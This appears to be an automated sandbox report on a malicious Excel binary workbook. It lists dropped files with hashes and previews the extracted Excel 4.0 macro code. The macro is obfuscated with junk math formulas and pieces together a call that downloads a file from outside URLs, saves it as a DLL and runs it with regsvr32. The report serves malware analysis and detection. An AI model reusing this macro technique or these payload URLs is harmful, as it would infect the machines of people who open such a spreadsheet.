                                                                                                                  Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8O.T]H.Q..;3...?..fk.lR..R$.R.Pb.Q...B..OA..T$.hAD...J../..-h...fj..+....;s.vg.Zsw.=...{.w.s.w.@.....;..s...O........;.y.p........,...s1@ Ir.:... .>.LLa..b?h...l.6..U....1....r.....T..O.d.KSA...7.YS..a.(F@....xe.^.I..$h....PpJ...k%.....9..QQ....h..!H*................./....2..J2..HG....A....Q&...k...d..&..Xa.t..E....E..f2.d(..v.~.P.+.pik+;...xEU.g....._xfw...+...(..pQ.(..(.U./..)..@..?..........f.'...lx+@F...+....)..k.A2...r~B,....TZ..y..9...`..0....q....yY....Q.......A.....8j[.O9..t..&...g. I@ ..;..X!...9S.J5..'.xh...8I.~.+...mf.m.W.i..{...+>P...Rh...+..br^$. q.^.......(..._.j...$..Ar...MZm|...9..E..!U[S.fDx7<....Wd.......p..C......^MyI:...c.^..SI.mGj,.......!...h..$..;...........yD./..a...-j.^:.}..v....RQY*.^......IEND.B`.
                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\CAA60556.png
                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                  File Type:PNG image data, 521 x 246, 8-bit/color RGB, non-interlaced
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):32996
                                                                                                                  Entropy (8bit):7.975478139053759
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:768:N4k48AnTViUidx37OODgvnrxtxAudMN1VTRVHdB4K7K:NE8m+L37OOwrCXN1VTR1PK
                                                                                                                  MD5:4E69B72B0CE87CC7EE30AA1A062147FE
                                                                                                                  SHA1:09B0AA5414E08756E0AE53E1BE5C70DB4DEAF2E8
                                                                                                                  SHA-256:77A1F749389CBF771D5197FF0FF17113FCA1D91989ADCADF2852876A6CC14988
                                                                                                                  SHA-512:6246AF2137E773F7719033AFE75F0B00FF3A4B5543DBA53737FC8D33EE42478E3D8A5CF166E9EFD2F54A2F3E0D62417BDDC1CB824642305B59AB1229313D2D79
                                                                                                                  Malicious:false
                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                  Preview: .PNG........IHDR..............[.J....sRGB.........pHYs..........+......IDATx^.].`......{%.$..A...R.P@z....O...S.<;.VT.REA.(...I...{.......m...]..r./.......~.|]h.Z....P.(........E."@...P.(.v.P.@..E."@....#@y.......E."@y.......E."...*78C.~O...P.<....<o..).....3.(op...."@...x...7x...S.(...g.P...!.=E."@..<.(o.5.3..P.(.......B.{..E.".y.P..ykNgL...P..!@y.3.......E........."@...8C...g...)......!@y..9.1E."@.p........S.(....C....[s:c..E."......!D...P.(.........t.....E....78C.~O...P.<....<o..).....3.(op...."@...x...7x...S.(...g.P...!.=E."@..<.(o.5.3..P.(.......B.{..E.".y.P..ykNgL...P..!@y.3.......E........."@...8C...g...)......!@y..9.1E."@.p........S.(....C....[s:c..E."......!D...P.(.........t.....E....78C.~O...P.<....<o..).....3.(op...."@...x...7x...S.(...g.P...!.=E."@..<.(o.5.3..P.(.......B.{..E.".y.P..ykNgL...P..!@y.3.......E........."@...8C...g...)......!@y..9.1E."@.p........S.(....C....[s:c..E."......!D...P.(.........t.....E....78C.~O...P.<....<o..).....3.(op...."@...x..
                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\D5AE39C5.png
                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                  File Type:PNG image data, 246 x 108, 8-bit/color RGB, non-interlaced
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):10270
                                                                                                                  Entropy (8bit):7.975714699744477
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:3sXvKLMbye/PEXiKTUgCto9h4F6NwfU6vGDpdYNbcQZgkbd4cgc:3iLh/gJ59CDfU6LocbGK
                                                                                                                  MD5:9C4F09E387EA7B36C8149EA7C5F8876E
                                                                                                                  SHA1:FF83384288EB89964C3872367E43F25FAFF007CC
                                                                                                                  SHA-256:A51C1D65092272DAEB2541D64A10539F0D04BC2F51B281C7A3296500CFCA56DE
                                                                                                                  SHA-512:0FDDE22CFDDE8BB1C04842D2810D0FD6D42192594E0D6120DE401B08B7E2CFFB5333792BC748E93CD70FA14734CC7D950620CB977DDBBDB52D92BDA8F35521F8
                                                                                                                  Malicious:false
                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                  Preview: .PNG........IHDR.......l...........sRGB.........pHYs..........+....'.IDATx^.].|.U...%...J.".....H.&Ui......E.........D.7....U.i..FH#=......3..$K....'{3....7........0.H......H..03..,....8.q........'@\...S@.../.0=....|....}|......0.... ...,LO........q._`az.....8......... .`..) @...X...q..>N...>.........q........'@\...S@.../.0=....|....}|......0.... ...,LO........q._`az.....8...l..m.i'Sj.W.i.S.TJ....D.D._%...]..i.;J..b..T.).Ik.L6..L.mN....!*..\..'{$.o._b..h....t"@.?...y...d..h..|..B9D..CJD..t."........bR"....I)H....z.......>|.....E.x..r....J.U..[...p:D....XF......A...E.....b..C...C..C......=.Z..$.=../....Y..x5CY.0l..,~.W. .?......;...$.'....<.H.2...z..6(.E........kw8w^.\~...".C,gl&.m..J2.).HI.....b.r...'.....r.H...P.....'...A.^.q..j).cZ.^1~.|.........dv^.^v..X..v..6/^.$rR. iK..H.Uu.Pvk....U.....'.Fd..Z.]mu\*1.Zb.\b...N..P..&tr;.W....J.K(@.^A..R.S.[~.v.R.YO...0-...2..h."..............7..Ng...R...e.&..@..t..N...{5...W.x./#.%..}t...F8-..M1..(4b1....&.....)B...6.
                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\E91A6D02.png
                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                  File Type:PNG image data, 934 x 29, 8-bit/color RGB, non-interlaced
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):42557
                                                                                                                  Entropy (8bit):7.992800895943226
                                                                                                                  Encrypted:true
                                                                                                                  SSDEEP:768:Pfsq4UmepRdblCFcXhw9KnRTRews6xD0FvBlwAS1A8x7BcS0OvD230:PR3ZblCF28KRsws6CFv0AYx7Bl3b230
                                                                                                                  MD5:B1F262A694930ADB699FA94E3394887F
                                                                                                                  SHA1:9C9B66D3A3F09AECA45DB94304CDD6FB3C5BD4C9
                                                                                                                  SHA-256:9C99EC61392B9022A38C1354124360147E8185065095BD2EC92B1416CF9F4B68
                                                                                                                  SHA-512:1CA7E6750178B88EC3AA7A0B83348EA389E26C27E0D7E919D807BE470714E5B4F04ACEB69D391F0498D4E465E6620E9449CA2F40755B5CE8196E683502EBF5F4
                                                                                                                  Malicious:false
                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                  Preview: .PNG........IHDR.............6......sRGB.........pHYs..........+......IDATx^....dU....S.:ON.0.0....s0 .....$..%#HR.T.......$..0C...Su...[.TM..{.......C.S}..^{......].^..ZX.Wb.W....X!..A.P....0..u...X.V.3.....z..tiO{GW..?...A.......ca2Y.... ...cAX..zZ..2M.$..g.O.e..r?z&................*....*.=..Z.A........a.Z..ka<..N.R.c......./.[..j.^...Nk.(..y.,..z"...R..Z+..D1Q....z....0..u~..jU_.b.Z.V....:..5:.(.......-...A2.O.{..p.j..].<........0..0..+...E...^...z....#..j.d...X._..1..M.5..O.^.."..l....G....U1........X.6.Z.\.&..h..m*..T..xH.j..3<$.H...a..n....}t.A.jT.6G.h@..<.x..x...cb......C..{.D.'QW<.o~..?.....4F_..B..h.\...y8..)....j.Z.d..#P..P..O.....(.0...f....B_z>.E .w../..(...'.Fw..yT..G..)...b9..g.AA`.a..v.zfY.F........._r.i.d.`....Q.g.m"..\..&.t.X.q1}.$.S....2..~...d."..1.. (.0.F....t...i..@f.. ...(..8..q.....I.....ad.....z%....;...y.O...X<Q..X.....B..H........<)....4.&9.4......1.h..#B.....g.....bO.59.A..M.....J..vX3*5..X....(G.A.u...8.. .{
                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\F5F4895F.png
                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                  File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):557
                                                                                                                  Entropy (8bit):7.343009301479381
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:6v/7aLMZ5I9TvSb5Lr6U7+uHK2yJtNJTNSB0qNMQCvGEvfvqVFsSq6ixPT3Zf:Ng8SdCU7+uqF20qNM1dvfSviNd
                                                                                                                  MD5:A516B6CB784827C6BDE58BC9D341C1BD
                                                                                                                  SHA1:9D602E7248E06FF639E6437A0A16EA7A4F9E6C73
                                                                                                                  SHA-256:EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074
                                                                                                                  SHA-512:C297A61DA1D7E7F247E14D188C425D43184139991B15A5F932403EE68C356B01879B90B7F96D55B0C9B02F6B9BFAF4E915191683126183E49E668B6049048D35
                                                                                                                  Malicious:false
                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                  Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8Oc.......l.9a._.X....@.`ddbc.]...........O..m7.r0|..."......?A.......w..;.N1u........_.[.\Y...BK=...F +.t.M~..oX..%....211o.q.P.".......y...../..l.r...4..Q]..h.....LL.d.......d....w.>{.e..k.7.9y.%.. .YpI...{.+Kv......./..\[...A....^.5c..O?.......G...VB..4HWY...9NU...?..S..$..1..6.U.....c... ....7..J. "M..5. ............_.......d.V.W.c.....Y.A..S....~.C.....q........t?..."n.....4......G_......Q..x..W.!L.a...3....MR.|.-P#P;..p._.......jUG....X........IEND.B`.
                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\fasol[1].htm
                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                  File Type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                                                                                                                  Category:downloaded
                                                                                                                  Size (bytes):57144
                                                                                                                  Entropy (8bit):5.023774373400307
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:768:cufBkoKQsjMcWnn32FmnWf6JodCGoNYMpyJmWpP3ZaH9i66G5RCwryU:cuZlKQsjnWn3azyuJmzbCwryU
                                                                                                                  MD5:837FA520945E0A5FF4438D46BAE639DD
                                                                                                                  SHA1:C6FCC0FDFA524398422B68FF4B39A6220B228986
                                                                                                                  SHA-256:CED971053831EB1B608131CD035D7E2DB809681D2F2116149844D2874CDBEE2F
                                                                                                                  SHA-512:836CA0C3858F54FC561985C412A04CBF85AAD909E246AB77902B7A3F4D2A09BC3E01B69B9102286ADF3A21692E622D329634F342E058B53D6E64B6A178398AE6
                                                                                                                  Malicious:false
                                                                                                                  IE Cache URL:https://dreamhimalayan.com/FMP5KgobFi/fasol.html
                                                                                                                  Preview: <!DOCTYPE html>.<html lang="en">.<head>.<meta name="viewport" content="width=device-width, initial-scale=1.0">.<meta name="google-site-verification" content="tSVYbhwv2tWBcDQndem7A9XBIxiSUD47LqErcCeQbQ4" />.<meta name="msvalidate.01" content="900A77FF1C6923B7662DE22E088252F9" />.<meta charset="utf-8">.<link rel="dns-prefetch" href="//www.dreamhimalayan.com">.<link rel="dns-prefetch" href="//www.googletagmanager.com">.<link rel="dns-prefetch" href="//schema.org">.<link rel="dns-prefetch" href="//www.facebook.com">.<link rel="dns-prefetch" href="//twitter.com">.<link rel="dns-prefetch" href="//www.youtube.com">.<link rel="dns-prefetch" href="//www.w3.org">.<link rel="dns-prefetch" href="//www.tripadvisor.com">.<link rel="dns-prefetch" href="//embed.tawk.to">.<link rel="dns-prefetch" href="//bootstrapcdn.com">.<link rel="dns-prefetch" href="//viber.com">.<link rel="dns-prefetch" href="//whatsapp.com">.<title></title>.<meta name="description" content="">.<meta name="keywords" content="" />.
                                                                                                                  C:\Users\user\AppData\Local\Temp\BF940000
                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):157784
                                                                                                                  Entropy (8bit):7.964526156146917
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3072:LdlQ9VlUBWA6CFvA7brCxAVIKDXv/V1REyNEsAnexVymd1xXPwuxd:Lw3liWA6FiYDXvNfzTYexVyWxfzz
                                                                                                                  MD5:1C17F43E062763965BA85C58CD8A2524
                                                                                                                  SHA1:742A759B60A6625859403D4CA29E0D1D9FDB1E37
                                                                                                                  SHA-256:BDBB9E5693CAD751468F4553886AAA4E0565903290197EA5E113E3C1D7571A90
                                                                                                                  SHA-512:01D8F02A9DDDE12762AE4C880CA355C5C45F7B1A2201BBECB3A250AF55CBB2B44A3A6BFE86B9F2781C04131E24134A64FCC58FA0D85665E44C76D48810051A61
                                                                                                                  Malicious:false
                                                                                                                  Preview: .U.N.0.}G.....J\@Z!....w.`?....U..1..=c7..JK)...'s.3.x|...z.....7#V..^i....u}.*L.)a...-.......n..+.v.>.p.9......p...hE.... .\t.OF._\z...:e.6._.L.T]-hy.d...~...T-.!.-E"....w$......%..C....H.4!jb.......o...{.m..7gD0......2K)..?...r.c........T7".?.[|a......f;H6.b....).5V........Y.......?A.v.l._.....Qt.B....b........c..t........\..g..a'...........6..].k..:T..Y.....}...K3.&..4.#....D..u .I.z.m..kF......@m...<.......PK..........!.[:..............[Content_Types].xml ...(.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                  File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):22
                                                                                                                  Entropy (8bit):2.9808259362290785
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:QAlX0Gn:QKn
                                                                                                                  MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                  SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                  SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                  SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                  Malicious:false
                                                                                                                  Preview: ....p.r.a.t.e.s.h.....
                                                                                                                  C:\Users\user\Desktop\~$audit-78958169.xlsb
                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):165
                                                                                                                  Entropy (8bit):1.6081032063576088
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                  MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                  SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                  SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                  SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                  Malicious:true
                                                                                                                  Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                  C:\Users\user\werty2.dll
                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                  File Type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):57144
                                                                                                                  Entropy (8bit):5.023774373400307
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:768:cufBkoKQsjMcWnn32FmnWf6JodCGoNYMpyJmWpP3ZaH9i66G5RCwryU:cuZlKQsjnWn3azyuJmzbCwryU
                                                                                                                  MD5:837FA520945E0A5FF4438D46BAE639DD
                                                                                                                  SHA1:C6FCC0FDFA524398422B68FF4B39A6220B228986
                                                                                                                  SHA-256:CED971053831EB1B608131CD035D7E2DB809681D2F2116149844D2874CDBEE2F
                                                                                                                  SHA-512:836CA0C3858F54FC561985C412A04CBF85AAD909E246AB77902B7A3F4D2A09BC3E01B69B9102286ADF3A21692E622D329634F342E058B53D6E64B6A178398AE6
                                                                                                                  Malicious:true
                                                                                                                  Preview: <!DOCTYPE html>.<html lang="en">.<head>.<meta name="viewport" content="width=device-width, initial-scale=1.0">.<meta name="google-site-verification" content="tSVYbhwv2tWBcDQndem7A9XBIxiSUD47LqErcCeQbQ4" />.<meta name="msvalidate.01" content="900A77FF1C6923B7662DE22E088252F9" />.<meta charset="utf-8">.<link rel="dns-prefetch" href="//www.dreamhimalayan.com">.<link rel="dns-prefetch" href="//www.googletagmanager.com">.<link rel="dns-prefetch" href="//schema.org">.<link rel="dns-prefetch" href="//www.facebook.com">.<link rel="dns-prefetch" href="//twitter.com">.<link rel="dns-prefetch" href="//www.youtube.com">.<link rel="dns-prefetch" href="//www.w3.org">.<link rel="dns-prefetch" href="//www.tripadvisor.com">.<link rel="dns-prefetch" href="//embed.tawk.to">.<link rel="dns-prefetch" href="//bootstrapcdn.com">.<link rel="dns-prefetch" href="//viber.com">.<link rel="dns-prefetch" href="//whatsapp.com">.<title></title>.<meta name="description" content="">.<meta name="keywords" content="" />.

                                                                                                                  Static File Info

                                                                                                                  General

                                                                                                                  File type:Microsoft Excel 2007+
                                                                                                                  Entropy (8bit):7.957827866057063
                                                                                                                  TrID:
                                                                                                                  • Excel Microsoft Office Binary workbook document (47504/1) 49.74%
                                                                                                                  • Excel Microsoft Office Open XML Format document (40004/1) 41.89%
                                                                                                                  • ZIP compressed archive (8000/1) 8.38%
                                                                                                                  File name:audit-78958169.xlsb
                                                                                                                  File size:157733
                                                                                                                  MD5:89b9bbe193a7ba34b8e1d3f619a5ce0e
                                                                                                                  SHA1:8bb384c33a5afda473e673ad1749ec0479ef7551
                                                                                                                  SHA256:e96919ae28abab397e13ac2b1a2024cbe0f742c9082d874073c6fe6ba015ad74
                                                                                                                  SHA512:b2799f90d735e4c78953823801a71f1732fbeeff271969a1da244cc1653b83a91cfd61e45b849224e872c721e30ff8c17b64f54c6539ec270dd22bf92dcffe50
                                                                                                                  SSDEEP:3072:zzjTemXbxVymd1xXPMU9VlUBWA6CFvA7bRCxAVIKxS6:DTecbxVyWxfMU3liWA6FsYn
                                                                                                                  File Content Preview:PK..........!...k.....".......[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                  File Icon

                                                                                                                  Icon Hash:74f0d0d2c6d6d0f4

                                                                                                                  Static OLE Info

                                                                                                                  General

                                                                                                                  Document Type:OpenXML
                                                                                                                  Number of OLE Files:1

                                                                                                                  OLE File "audit-78958169.xlsb"

                                                                                                                  Indicators

                                                                                                                  Has Summary Info:
                                                                                                                  Application Name:
                                                                                                                  Encrypted Document:
                                                                                                                  Contains Word Document Stream:
                                                                                                                  Contains Workbook/Book Stream:
                                                                                                                  Contains PowerPoint Document Stream:
                                                                                                                  Contains Visio Document Stream:
                                                                                                                  Contains ObjectPool Stream:
                                                                                                                  Flash Objects Count:
                                                                                                                  Contains VBA Macros:

                                                                                                                  Macro 4.0 Code

                                                                                                                  "=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=FORMULA('Doc2'!BL28,'Doc3'!AY16)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=FORMULA(""U""&'Doc3'!AY16&'Doc2'!BL29&'Doc2'!BL30,'Doc3'!AY10)",,,"=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=FORMULA('Doc2'!BJ39&'Doc2'!BO28&'Doc3'!AY17&'Doc2'!BJ43&'Doc3'!AY10&'Doc2'!BJ41&'Doc2'!BJ42&'Doc2'!BJ41&'Doc3'!AY11&'Doc2'!BJ41&'Doc2'!BJ42&'Doc2'!BJ41&'Doc3'!AY12&'Doc2'!BJ41&'Doc2'!BJ45&'Doc2'!BJ42&'Doc2'!BJ41&""https://""&'Doc3'!AY13&'Doc2'!BJ41&'Doc2'!BJ42&'Doc2'!BJ41&before.4.6.53.sheet!BG23&'Doc2'!BJ41&'Doc2'!BJ45&'Doc2'!BJ45&'Doc2'!BJ44,'Doc3'!AW10)=SUMXMY2(452354,45245)",,,,,,,,,"=FORMULA('Doc2'!BO36,'Doc3'!AY13)",,,=GOTO('Doc3'!AW8),,,"=FORMULA('Doc2'!BM28&'Doc2'!BM29&'Doc2'!BM30&""B"",'Doc3'!AY12)",,,,,,"=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=A
                                                                                                                  ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,R,J,,CAL,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,EXEC,,,0,,LM,JC,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,on,CB,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,wnl,,oadT,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,Fil,,LDo,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,""")",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"""",,,,,o,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,&,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"(""r",,,,0,0,,,forfacks.com/v97aI6WALA4/fasol.html,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,eg,,,,,,,,dreamhimalayan.com/FMP5KgobFi/fasol.html,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,svr32 -s ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=,=,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"""",,,,,"=LEFT(""LdecvsbgvrsxLxrgxg"",1)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,",",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"(""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,",0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,